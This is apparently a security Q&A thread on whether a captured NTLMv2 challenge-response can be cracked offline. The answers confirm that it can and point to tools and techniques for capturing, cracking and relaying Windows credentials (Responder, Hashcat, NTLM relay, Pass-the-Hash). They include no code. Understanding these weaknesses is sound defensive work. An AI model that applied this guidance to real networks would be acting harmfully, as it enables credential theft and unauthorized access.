How feasible is it for an attacker to brute-force an NTLMv2 response captured off the network?

Question

According to the Wikipedia article on NTLM here: https://en.wikipedia.org/wiki/NT_LAN_Manager

..under the NTLMv2 description it mentions that

NTLMv2 sends two responses to an 8-byte server challenge

So basically according to the article the NTLMv2 response becomes this:

SC = 8-byte server challenge, random
CC = 8-byte client challenge, random
CC* = (X, time, CC2, domain name)
v2-Hash = HMAC-MD5(NT-Hash, user name, domain name)
LMv2 = HMAC-MD5(v2-Hash, SC, CC)
NTv2 = HMAC-MD5(v2-Hash, SC, CC*)
response = LMv2 | CC | NTv2 | CC*

I am trying to understand the security challenges of NTLMv2 and how challenging it would an attacker that captures the above NTLMv2 response via sniffing the network, to brute-force it to get to the password.

Since the hash includes the random server challenge (SC), it already makes it difficult. But let's suppose, the attacker has been sniffing and had already captured the SC when the server sent it to the client.

Attacker should also be able to see the client challenge (CC & CC*) from response as

response = LMv2 | CC | NTv2 | CC*

right?.. so does this mean the attacker can have a fair go at brute-forcing the NTV2 or LMV2 hashes included in the response, given that the following information is with them now

• SC (Server Challenge)
• CC & CC*
• response
• user name, domain name (easily acquired by an attacker already in the network)

Is this the correct way to understand it?

Many thanks

Answer 1

It's not really about brute-forcing, dictionarying (is that a word?), or rainbow-tabling the NET-NTLMv2 creds, but more-so about comparing them to stored LM/NTLM hashes pulled from the flat-file SAM database or the in-memory LSASS process (which can usually be reversed to cleartext but in this case you actually want the hash for comparative purposes).

Worse (*), NET-NTLMv2 can be used for NTLM Relay attacks. One of the best ways to expedite use of NTLM Relay is with -- https://bluescreenofjeff.com/2016-02-19-smb-relay-with-snarfjs-making-the-most-of-your-mitm/

For combining methods of LM/NTLM credential conversion (along with, say, your NET-NTLMv2 captures) to their current-valid, cleartext equivalents, check out the work from Praetorian (Gladius) and root9b (ntlmv2_capture_hashcheck.rb).

If you are trying to crack NET-NTLMv2 from just pcap files or similar (i.e., you're not on the network right now or don't have SAM/LSASS LM/NTLM material to compare it to using the Praetorian or root9b techniques), then you want to check out this blog post -- http://www.exploresecurity.com/from-csv-to-cmd-to-qwerty/ -- as the author explains which parts of the NET-NTLMv2 request and response need to be adjusted in order to fit cleanly into John the Ripper (or Hashcat) for cracking purposes.

(*) It actually gets much, much worse because NTLM Relay is only scratching the surface when you consider SMB Relay, Pass-the Hash, JASBUG, Potato, Tater, SmashedPotato, (if you can capture any network traffic), QuickCreds and PoisonTap (if you have the ability to get a USB device plugged into a local-station USB port), as well as crEAP and EAPeak (if you have access to WiFi).

Answer 2

Yes, it is quite feasable to do a dictionary attack on NTLMv2 challenge response. However, with only the response, it's not possible. The attacker needs both the challenge and response. In fact, its actually quite fast to crack.

In fact, hackers often use a tool like Responder.py to capture NTLMv2 hashes and then use something like Hashcat to crack (or relay) the challenge response hashes.